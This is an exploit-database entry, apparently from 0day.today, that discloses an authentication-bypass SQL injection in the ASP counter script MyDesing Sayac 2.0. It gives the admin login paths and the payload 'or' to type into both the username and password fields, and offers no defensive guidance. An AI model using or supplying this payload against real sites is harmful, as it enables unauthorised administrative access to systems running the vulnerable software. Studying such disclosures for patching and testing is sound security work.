id: 4787
date: 02/03/2009
title: MyDesing Sayac 2.0 (Auth Bypass) SQL Injection Vulnerability
author: Kacak
cves: 

============================================================
MyDesing Sayac 2.0 (Auth Bypass) SQL Injection Vulnerability
============================================================


#############################################

[~]Script :MyDesing Sayac v2.0

[~]Site :http://www.mydesign.gen.tr/myforum/forum_posts.asp?TID=90

[~]Download :http://www.aspindir.com/goster/2801

[~] Vulnerability : (Auth Bypass) Sql Injection

#############################################

  ~ Exploit ~

www.site.com/admin/admin.asp

www.site.com/PATH/admin

UserName : 'or'

Pass : 'or'


#############################################



#  0day.today [2023-03-27]  #